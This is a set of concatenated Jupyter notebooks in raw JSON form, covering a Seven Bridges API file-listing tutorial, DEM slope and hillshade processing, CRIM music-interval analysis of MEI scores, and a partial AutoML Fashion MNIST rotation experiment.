"# Which _files_ are in my project?\n### Overview\nHere we focus on listing all files within a single project. Importantly, files are only accessible **within** a project<sup>1</sup>. As with any **list**-type call, we will get minimal information about each file. \n\n### Prerequisites\n 1. You need to be a member (or owner) of _at least one_ project.\n 2. You need your _authentication token_ and the API needs to know about it. See <a href=\"Setup_API_environment.ipynb\">**Setup_API_environment.ipynb**</a> for details.\n 3. You understand how to <a href=\"projects_listAll.ipynb\" target=\"_blank\">list</a> projects you are a member of (we will just use that call directly and pick one here).\n 4. Your project needs to have at least one file inside\n \n## Imports\nWe import the _Api_ class from the official sevenbridges-python bindings below.\n\n<sup>1</sup> There is no \"list **all** *files*\" API call that parallels the \"list **all**\" calls for *projects* and *apps*",
"_____no_output_____"
]
],
[
[
"import sevenbridges as sbg",
"_____no_output_____"
]
],
[
[
"## Initialize the object\nThe _Api_ object needs to know your **auth\\_token** and the correct path. Here we assume you are using the .sbgrc file in your home directory. For other options see <a href=\"Setup_API_environment.ipynb\">Setup_API_environment.ipynb</a>",
"_____no_output_____"
]
],
[
[
"# [USER INPUT] specify platform {cgc, sbg}\nprof = 'cgc'\n\nconfig_config_file = sbg.Config(profile=prof)\napi = sbg.Api(config=config_config_file)",
"_____no_output_____"
]
],
[
[
"## List (up to 50 of) my files\nA **list**-call for projects returns the following *attributes*:\n* **id** _Unique_ identifier for each file, generated by the CGC\n* **name** Name of file, maybe _non-unique_\n* **href** Address<sup>1</sup> of the file.\n\nSince we are not setting the **limit** parameter in api.files.query(), it _defaults_ to 50 records returned\n\n<sup>1</sup> This is the address where, by using API you can get this resource",
"_____no_output_____"
]
],
[
[
"# [USER INPUT] Set project name here, (pick one with files):\nproject_name = 'Gene Expression'\n\n\n# LIST all projects and check for name match\nmy_project = [p for p in api.projects.query(limit=100).all() \\\n if p.name == project_name] \n\nif not my_project: # exploit fact that empty list is False, {list, tuple, etc} is True\n print('The project named (%s) does not exist, please check spelling (especially trailing spaces)' \\\n % project_name)\n raise KeyboardInterrupt\nelse:\n # list the files in the target project\n my_files = api.files.query(my_project[0].id)\n\n# print up to the first 10 files\nfor ii in range(min(10,my_files.total)):\n print('file name is (%s); \\t file id is (%s)' % (my_files[ii].name, my_files[ii].id))",
"_____no_output_____"
]
],
[
[
"#### Note\nIf you had more than 50 files in your project you would hit pagination. For an example of how to deal with that see <a href=\"projects_listAll.ipynb\" target=\"_blank\">projects_listAll.ipynb</a>\n\n## Let's get all the files\nUsing the **.all()** method will take care of pagination for us",
"_____no_output_____"
]
],
[
[
"# print all files\nfor f in my_files.all():\n print('file name is (%s); \\t file id is (%s)' % (f.name, f.id))",
"_____no_output_____"
]
],
[
[
"## Additional Information\nDetailed documentation of this particular REST architectural style request is available [here](http://docs.cancergenomicscloud.org/docs/list-files-in-a-project)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
e70680564596fac43467e5ad54a8939ef39aa02c | 461,604 | ipynb | Jupyter Notebook | Code/[3]New tif creation.ipynb | SalimFares4/Image-Segmentation | 787530a2db9ebd5881eaf042317411ce432fcc71 | [
"MIT"
] | null | null | null | Code/[3]New tif creation.ipynb | SalimFares4/Image-Segmentation | 787530a2db9ebd5881eaf042317411ce432fcc71 | [
"MIT"
] | 3 | 2021-12-16T10:09:36.000Z | 2022-02-11T17:53:31.000Z | Code/[3]New tif creation.ipynb | SalimFares4/Image-Segmentation | 787530a2db9ebd5881eaf042317411ce432fcc71 | [
"MIT"
] | null | null | null | 461,604 | 461,604 | 0.956944 | [
[
[
"!pip install rasterio",
"Collecting rasterio\n Downloading rasterio-1.2.10-cp37-cp37m-manylinux1_x86_64.whl (19.3 MB)\n\u001b[K |████████████████████████████████| 19.3 MB 5.9 MB/s \n\u001b[?25hRequirement already satisfied: click>=4.0 in /usr/local/lib/python3.7/dist-packages (from rasterio) (7.1.2)\nRequirement already satisfied: attrs in /usr/local/lib/python3.7/dist-packages (from rasterio) (21.4.0)\nCollecting affine\n Downloading affine-2.3.0-py2.py3-none-any.whl (15 kB)\nRequirement already satisfied: setuptools in /usr/local/lib/python3.7/dist-packages (from rasterio) (57.4.0)\nCollecting cligj>=0.5\n Downloading cligj-0.7.2-py3-none-any.whl (7.1 kB)\nRequirement already satisfied: numpy in /usr/local/lib/python3.7/dist-packages (from rasterio) (1.19.5)\nRequirement already satisfied: certifi in /usr/local/lib/python3.7/dist-packages (from rasterio) (2021.10.8)\nCollecting click-plugins\n Downloading click_plugins-1.1.1-py2.py3-none-any.whl (7.5 kB)\nCollecting snuggs>=1.4.1\n Downloading snuggs-1.4.7-py3-none-any.whl (5.4 kB)\nRequirement already satisfied: pyparsing>=2.1.6 in /usr/local/lib/python3.7/dist-packages (from snuggs>=1.4.1->rasterio) (3.0.7)\nInstalling collected packages: snuggs, cligj, click-plugins, affine, rasterio\nSuccessfully installed affine-2.3.0 click-plugins-1.1.1 cligj-0.7.2 rasterio-1.2.10 snuggs-1.4.7\n"
],
[
"from osgeo import gdal\nimport numpy as np\nimport rasterio\nimport rasterio.plot\nimport matplotlib\nfrom matplotlib import pyplot as plt",
"_____no_output_____"
],
[
"# Root Directory\nImage_Segmentation_Path = '/content/drive/My Drive/Image Segmentation/'\n\n# Inputs/Sources\nProcessed_DEMs_Path = Image_Segmentation_Path + \"Processed DEMs/\"\nhigh_dem_interpolated = Processed_DEMs_Path + \"high_dem_interpolated.tif\"\ntest_dem = Image_Segmentation_Path + 'Source DEMs/test_dem.tif'\n\n# Outputs/Destinations\nslope_path = Processed_DEMs_Path + \"slope.tif\"\naspect_path = Processed_DEMs_Path + \"aspect.tif\"\nhillshade_path = Processed_DEMs_Path + \"hillshade.tif\"\n\n# transformed_path = Processed_DEMs_Path + \"high_dem_transformed.tif\"\ntransformed_path = Processed_DEMs_Path + \"1.tif\"\nslope_transformed_path = Processed_DEMs_Path + \"slope_transformed.tif\"\naspect_transformed_path = Processed_DEMs_Path + \"aspect_transformed.tif\"\ntest_dem_transformed = Processed_DEMs_Path + 'test_dem_transformed.tif'\ntest_dem_slope = Processed_DEMs_Path + 'test_dem_slope.tif'\ntest_dem_hillshade = Processed_DEMs_Path + 'test_dem_hillshade.tif'\n# PNGs for the report \nPNG_Path = Image_Segmentation_Path + \"PNG/\"",
"_____no_output_____"
],
[
"from sklearn.preprocessing import MinMaxScaler\nscaler = MinMaxScaler()",
"_____no_output_____"
],
[
"with rasterio.open(DEM) as dataset:\n profile =dataset.profile\n meta = dataset.meta\n array=dataset.read(1)\n no_data_value = meta[\"nodata\"]\n\nno_data_value",
"_____no_output_____"
],
[
"def transform_values(DEM, transformed_path):\n with rasterio.open(DEM) as dataset:\n profile =dataset.profile\n meta = dataset.meta\n array=dataset.read(1)\n no_data_value = meta[\"nodata\"]\n array[array == no_data_value] = np.nan\n transformed_array = np.interp(array, (np.nanmin(array),np.nanmax(array)), (0,255))\n # transformed_array = scaler.fit_transform(array)\n transformed_array[np.isnan(transformed_array)] = -1\n with rasterio.open(transformed_path, 'w', **profile) as dest: \n dest.write_band(1, transformed_array)\n return transformed_array",
"_____no_output_____"
],
[
"def calculate_slope(DEM, slope_path):\n gdal.DEMProcessing(slope_path, DEM, 'slope')\n transform_values(DEM=slope_path, transformed_path=slope_transformed_path)\n with rasterio.open(slope_transformed_path) as dataset:\n slope=dataset.read(1)\n return slope\n\ndef calculate_aspect(DEM, aspect_path):\n gdal.DEMProcessing(aspect_path, DEM, 'aspect')\n transform_values(DEM=aspect_path, transformed_path=aspect_transformed_path)\n with rasterio.open(aspect_transformed_path) as dataset:\n aspect=dataset.read(1)\n return aspect\n\ndef calculate_hillshade(DEM, hill_shade_path):\n gdal.DEMProcessing(hill_shade_path, DEM, 'hillshade')\n with rasterio.open(hill_shade_path) as dataset:\n hillshade=dataset.read(1)\n return hillshade",
"_____no_output_____"
],
[
"tmp = transform_values(DEM=high_dem_interpolated, transformed_path=transformed_path)\n",
"_____no_output_____"
],
[
"np.min(tmp)\nnp.nanmin(tmp)",
"_____no_output_____"
],
[
"fig, (ax_interpolated, ax_transformed) = plt.subplots(ncols=2, nrows=1, figsize=(14,7))\nwith rasterio.open(high_dem_interpolated) as dem: \n rasterio.plot.show(dem, ax=ax_interpolated, title='Interpolated DEM')\nwith rasterio.open(transformed_path) as dem: \n rasterio.plot.show(dem, ax=ax_transformed, title='Transformed DEM')\n# fig.savefig(PNG_Path+\"Transformed DEM.png\")",
"_____no_output_____"
],
[
"# test = transform_values(DEM=test_dem, transformed_path=test_dem_transformed)",
"_____no_output_____"
],
[
"aspect",
"_____no_output_____"
],
[
"slope=calculate_slope(DEM=transformed_path, slope_path=slope_path)\n# aspect=calculate_aspect(DEM=high_dem_interpolated, aspect_path=aspect_path)\nhillshade=calculate_hillshade(DEM=transformed_path, hill_shade_path=hillshade_path)",
"_____no_output_____"
],
[
"slope=calculate_slope(DEM=test_dem, slope_path=test_dem_slope)\nhillshade=calculate_hillshade(DEM=test_dem, hill_shade_path=test_dem_hillshade)",
"_____no_output_____"
],
[
"print(np.min(slope))",
"0.0\n"
],
[
"fig, ax = plt.subplots(ncols=1, nrows=1, figsize=(10, 10))\ndem = rasterio.open(high_dem_interpolated)\nrasterio.plot.show(dem, title='Interpolated DEM')\nfig.savefig(PNG_Path+\"Interpolated DEM.png\")",
"_____no_output_____"
],
[
"arr =dem.read(1)\npure = arr[arr != dem.meta['nodata']]",
"_____no_output_____"
],
[
"len(pure)",
"_____no_output_____"
],
[
"np.min(pure)",
"_____no_output_____"
],
[
"with rasterio.open(aspect_path) as aspect:\n rasterio.plot.show(aspect)\n# fig.savefig(PNG_Path+\"Aspect.png\")",
"_____no_output_____"
],
[
"with rasterio.open(slope_path) as slope:\n rasterio.plot.show(slope)\n# fig.savefig(PNG_Path+\"Slope\")",
"_____no_output_____"
],
[
"with rasterio.open(hillshade_path) as hill:\n rasterio.plot.show(hill)\n# fig.savefig(PNG_Path+\"Hillshade.png\")\n",
"_____no_output_____"
],
[
"# !pip install richdem\nimport richdem as rd",
"_____no_output_____"
],
[
"tmp2 = rasterio.open(high_dem_interpolated)",
"_____no_output_____"
],
[
"t = tmp2.read(1)",
"_____no_output_____"
],
[
"np.max(t)",
"_____no_output_____"
],
[
"np.min(t)",
"_____no_output_____"
],
[
"tt = np.interp(t, (np.nanmin(t),np.nanmax(t)), (0,255))",
"_____no_output_____"
],
[
"dem_rda = rd.rdarray(tt, no_data=0)\nrd.rdShow(dem_rda, axes=False, cmap='viridis')",
"_____no_output_____"
],
[
"np.max(tt)",
"_____no_output_____"
],
[
"np.min(tt)",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e7068819bc6e791ecd249f6c3b0c2dc1b0ddf06d | 68,344 | ipynb | Jupyter Notebook | .ipynb_checkpoints/CRIM_Intervals_Morgan-Copy1-checkpoint.ipynb | RichardFreedman/CRIM-notebooks | e2aa0b0798615898644df9fe0cc92fe532a4bbdc | [
"MIT"
] | null | null | null | .ipynb_checkpoints/CRIM_Intervals_Morgan-Copy1-checkpoint.ipynb | RichardFreedman/CRIM-notebooks | e2aa0b0798615898644df9fe0cc92fe532a4bbdc | [
"MIT"
] | null | null | null | .ipynb_checkpoints/CRIM_Intervals_Morgan-Copy1-checkpoint.ipynb | RichardFreedman/CRIM-notebooks | e2aa0b0798615898644df9fe0cc92fe532a4bbdc | [
"MIT"
] | null | null | null | 33.436399 | 318 | 0.360544 | [
[
[
"## Start CRIM Intervals",
"_____no_output_____"
]
],
[
[
"from intervals.main_objs import *\nimport re\nimport pandas as pd",
"_____no_output_____"
]
],
[
[
"## Load MEI Files from CRIM or Github by pasting one or more of [these links](https://docs.google.com/spreadsheets/d/1TzRqnzgcYYuQqZR78c5nizIsBWp4pnblm2wbU03uuSQ/[email protected]#gid=0) below.\n\n*Note: each file must be in quotation marks and separated by commas\n",
"_____no_output_____"
]
],
[
[
"titles = ['https://crimproject.org/mei/CRIM_Model_0001.mei', \n'https://crimproject.org/mei/CRIM_Model_0002.mei', \n'https://crimproject.org/mei/CRIM_Model_0008.mei']\n\n'https://crimproject.org/mei/CRIM_Model_0009.mei', \n'https://crimproject.org/mei/CRIM_Model_0010.mei', \n'https://crimproject.org/mei/CRIM_Model_0011.mei', \n'https://crimproject.org/mei/CRIM_Model_0012.mei', \n'https://crimproject.org/mei/CRIM_Model_0013.mei', \n'https://crimproject.org/mei/CRIM_Model_0014.mei', \n'https://crimproject.org/mei/CRIM_Model_0015.mei', \n'https://crimproject.org/mei/CRIM_Model_0016.mei', \n'https://crimproject.org/mei/CRIM_Model_0017.mei', \n'https://crimproject.org/mei/CRIM_Model_0019.mei', \n'https://crimproject.org/mei/CRIM_Model_0020.mei', \n'https://crimproject.org/mei/CRIM_Model_0021.mei',\n'https://crimproject.org/mei/CRIM_Mass_0001_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0001_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0001_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0001_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0001_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0002_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0002_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0002_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0002_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0002_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0003_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0003_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0003_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0003_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0003_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0004_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0004_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0004_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0004_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0004_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0005_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0005_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0005_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0005_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0005_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0006_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0006_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0006_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0006_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0006_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0007_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0007_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0007_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0007_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0007_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0008_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0008_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0008_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0008_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0008_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0009_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0009_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0009_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0009_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0009_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0010_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0010_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0010_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0010_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0010_5.mei', 
\n'https://crimproject.org/mei/CRIM_Mass_0011_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0011_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0011_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0011_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0011_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0012_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0012_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0012_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0012_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0012_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0013_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0013_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0013_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0013_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0013_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0014_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0014_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0014_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0014_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0014_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0015_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0015_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0015_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0015_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0015_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0016_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0016_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0016_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0016_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0016_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0017_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0017_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0017_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0017_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0017_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0018_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0018_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0018_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0018_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0018_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0019_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0019_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0019_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0019_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0019_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0020_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0020_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0020_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0020_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0020_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0021_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0021_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0021_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0021_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0021_5.mei', \n'https://crimproject.org/mei/CRIM_Mass_0022_1.mei', \n'https://crimproject.org/mei/CRIM_Mass_0022_2.mei', \n'https://crimproject.org/mei/CRIM_Mass_0022_3.mei', \n'https://crimproject.org/mei/CRIM_Mass_0022_4.mei', \n'https://crimproject.org/mei/CRIM_Mass_0022_5.mei'",
"_____no_output_____"
],
[
"titles\n",
"_____no_output_____"
],
[
"for title in titles:\n short_title = clean_title = re.search(\"([^\\/]+$)\", title).group()\n corpus = CorpusBase([title])\n piece = corpus.scores[0]\n a= piece.getMelodic()\n a.to_csv(f\"{short_title}.csv\")\n",
"Memoized piece detected...\nMemoized piece detected...\nMemoized piece detected...\n"
],
[
"titles2 = ['https://crimproject.org/mei/CRIM_Model_0001.mei', \n'https://crimproject.org/mei/CRIM_Model_0002.mei']\ncorpus = CorpusBase(titles2)\n",
"Memoized piece detected...\nMemoized piece detected...\n"
],
[
"p1, p2 = corpus.scores\np1.getMelodic()",
"_____no_output_____"
]
],
[
[
"## Give the scores short names, in order according to the way they were listed above\n",
"_____no_output_____"
]
],
[
[
"# mass, model = corpus.scores\nprint(corpus)\n",
"<module 'music21.corpus' from '/Users/rfreedma/opt/anaconda3/lib/python3.8/site-packages/music21/corpus/__init__.py'>\n"
]
],
[
[
"## Now apply various methods to the scores:\n* **getNoteRest** returns all the notes and rests, each voice as a column\n* **getDuration** returns the durations for all notes and rests, as above\n* **getMelodic** returns the melodic intervals in each voice as a column\n* **getHarmonic** returns pairs of harmonic intervals between each pair of voices\n* **getNgrams** returns segments of various kinds, melodic (one voice) or modular (pairs of voices, including vertical and horizontal motion)\n---\n\n### Pandas Tools:\n* **df.value_counts()** returns summary for each pitch, duration for any type\n* save results as variable, then:**`.apply(pd.Series.value_counts).fillna(0).astype(int) `**\n---\n\n### Documentation available via this command:\n* for any method, use the following read documentation:\n`print(model.getNgrams.__doc__)`\n\n---\n",
"_____no_output_____"
]
],
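[
[
"# Illustration of the documentation tip above (assumes 'model' from the cells\n# above; any of the listed methods can be substituted for getNgrams)\nprint(model.getNgrams.__doc__)",
"_____no_output_____"
]
],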
[
[
"model.getMelodic()",
"_____no_output_____"
]
],
[
[
"# Notes and Rests\n",
"_____no_output_____"
]
],
[
[
"notes = model.getNoteRest()\nnotes.fillna(value= \"-\", inplace=True)\nnotes.reset_index()",
"_____no_output_____"
],
[
"notes.value_counts()\n# notes.stack().value_counts()",
"_____no_output_____"
],
[
"df = notes.apply(pd.Series.value_counts).fillna(0).astype(int)\n",
"_____no_output_____"
]
],
[
[
"# Melodic Intervals\n* kind='d' for diatonic; 's' for chromatic/semitone\n* To save as CSV: \n`mel_int.to_csv('file_name.csv')`\n",
"_____no_output_____"
]
],
[
[
"mel_int = model.getMelodic(kind='d')\nmel_int.fillna(value= \"-\", inplace=True)\nmel_int.reset_index()\n\n",
"_____no_output_____"
]
],
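[
[
"# As noted above, the interval table can be saved (hypothetical file name), and\n# the pandas recipe from the methods overview summarizes interval counts per voice.\n# mel_int.to_csv('model_melodic_intervals.csv')\nmel_int.apply(pd.Series.value_counts).fillna(0).astype(int)",
"_____no_output_____"
]
],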
[
[
"# Durations\n",
"_____no_output_____"
]
],
[
[
"durs = model.getDuration()\ndurs.fillna(value= \"-\", inplace=True)",
"_____no_output_____"
]
],
[
[
"## Combine Notes and Durations as One DataFrame",
"_____no_output_____"
]
],
[
[
"notes_durs = pd.concat([notes, durs], axis=1)\nnotes_durs\n",
"_____no_output_____"
]
],
[
[
"# Select Columns for One Voice\n",
"_____no_output_____"
]
],
[
[
"notes_durs_s = notes_durs.iloc[:, [0,4]]\nnotes_durs_s",
"_____no_output_____"
]
],
[
[
"## N-Grams in Each Voice\n* for Melodic or Durations",
"_____no_output_____"
]
],
[
[
"mel = model.getMelodic()\nngrams = model.getNgrams(df=mel, n=4)\nngrams.reset_index()\n# mel2 = mel.iloc[:, [0]]\n# ngrams = model.getNgrams(df=mel2, n=5)\n# out = ngrams.value_counts()\n# out\n",
"_____no_output_____"
]
],
[
[
"# Harmonic Intervals between Voices",
"_____no_output_____"
]
],
[
[
"harm = model.getHarmonic()",
"_____no_output_____"
]
],
[
[
"# Two-Voice Modules as N-Grams\n",
"_____no_output_____"
]
],
[
[
"regMel = mass.getMelodic(unit=2, kind='d')\nregMel\nhar = mass.getHarmonic(kind='d')\nregHar = mass.regularize(har, 2)\nregHar\nng = mass.getNgrams(df=regHar, how='modules', other=regMel, cell_type=str)\nng",
"_____no_output_____"
]
],
[
[
"# NGrams with Regularized Durations",
"_____no_output_____"
]
],
[
[
"\n\nfiltered = ng[ng.apply(lambda row: row.astype(str).str.contains('7_1, 6_-2, 8').any(), axis=1)].copy()\nfiltered.reset_index(inplace=True)\nfiltered[\"measure\"] = filtered['index']/8+1\nfiltered\n\n",
"_____no_output_____"
]
],
[
[
"## Ngrams with Real Durations",
"_____no_output_____"
]
],
[
[
"modules2 = mass.getNgrams(how='modules', cell_type=str)\nmodules2\nfiltered2 = modules2[modules2.apply(lambda row: row.astype(str).str.contains('7_Held, 6_-2, 8').any(),axis=1)].copy()\nfiltered2.reset_index(inplace=True)\nfiltered2[\"measure\"] = filtered['index']/8+1\n\nfiltered2\n",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
e7068844abf7af9cb08ad9f3a9b199fbb6a94a24 | 20,767 | ipynb | Jupyter Notebook | docs/case_studies/test14.ipynb | thalvari/dpEmu-AutoML | b24eac686fae4147264c1ccc8169fd96b1875577 | [
"MIT"
] | null | null | null | docs/case_studies/test14.ipynb | thalvari/dpEmu-AutoML | b24eac686fae4147264c1ccc8169fd96b1875577 | [
"MIT"
] | 6 | 2019-11-19T05:44:24.000Z | 2019-12-18T21:10:04.000Z | docs/case_studies/test14.ipynb | thalvari/dpEmu-AutoML | b24eac686fae4147264c1ccc8169fd96b1875577 | [
"MIT"
] | null | null | null | 28.025641 | 127 | 0.520634 | [
[
[
"# AutoML Image Classification: With Rotation (Fashion MNIST)",
"_____no_output_____"
]
],
[
[
"import warnings\nwarnings.simplefilter(action=\"ignore\", category=FutureWarning)",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
]
],
[
[
"import random as rn\nfrom abc import ABC, abstractmethod\n\nimport autokeras as ak\nimport h2o\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom h2o.automl import H2OAutoML\nfrom keras.datasets import fashion_mnist\nfrom numpy.random import RandomState\nfrom sklearn.datasets import load_digits\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nfrom tpot import TPOTClassifier\n\nfrom dpemu import runner\nfrom dpemu.filters.common import GaussianNoise, Clip\nfrom dpemu.filters.image import RotationPIL\nfrom dpemu.nodes import Array\nfrom dpemu.nodes.series import Series\nfrom dpemu.plotting_utils import visualize_scores, print_results_by_model\nfrom dpemu.utils import generate_tmpdir",
"Better speed can be achieved with apex installed from https://www.github.com/nvidia/apex.\n"
],
[
"def get_data():\n # random_state = RandomState(42)\n # x, y = load_digits(return_X_y=True)\n # y = y.astype(np.uint8)\n # return train_test_split(x, y, test_size=.25, random_state=random_state)\n (x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()\n s = x_train.shape[1]\n x_train = x_train.reshape((len(x_train), s**2)).astype(np.float64)\n x_test = x_test.reshape((len(x_test), s**2)).astype(np.float64)\n return x_train, x_test, y_train, y_test",
"_____no_output_____"
],
[
"def get_err_root_node():\n # err_img_node = Array(reshape=(8, 8))\n err_img_node = Array(reshape=(28, 28))\n\n err_root_node = Series(err_img_node)\n err_img_node.addfilter(RotationPIL(\"max_angle\"))\n return err_root_node\n # err_root_node = Series(err_img_node)\n # err_img_node.addfilter(GaussianNoise(\"mean\", \"std\"))\n # err_img_node.addfilter(Clip(\"min_val\", \"max_val\"))\n # return err_root_node",
"_____no_output_____"
],
[
"def get_err_params_list(data):\n angle_steps = np.linspace(0, 180, num=1)\n err_params_list = [{\"max_angle\": a} for a in angle_steps]\n return err_params_list\n # min_val = np.amin(data)\n # max_val = np.amax(data)\n # std_steps = np.round(np.linspace(0, max_val, num=6), 3)\n # err_params_list = [{\"mean\": 0, \"std\": std, \"min_val\": min_val, \"max_val\": max_val} for std in std_steps]\n # return err_params_list",
"_____no_output_____"
],
[
"class Preprocessor:\n\n def run(self, train_data, test_data, params):\n return np.round(train_data).astype(np.uint8), np.round(test_data).astype(np.uint8), {}",
"_____no_output_____"
],
[
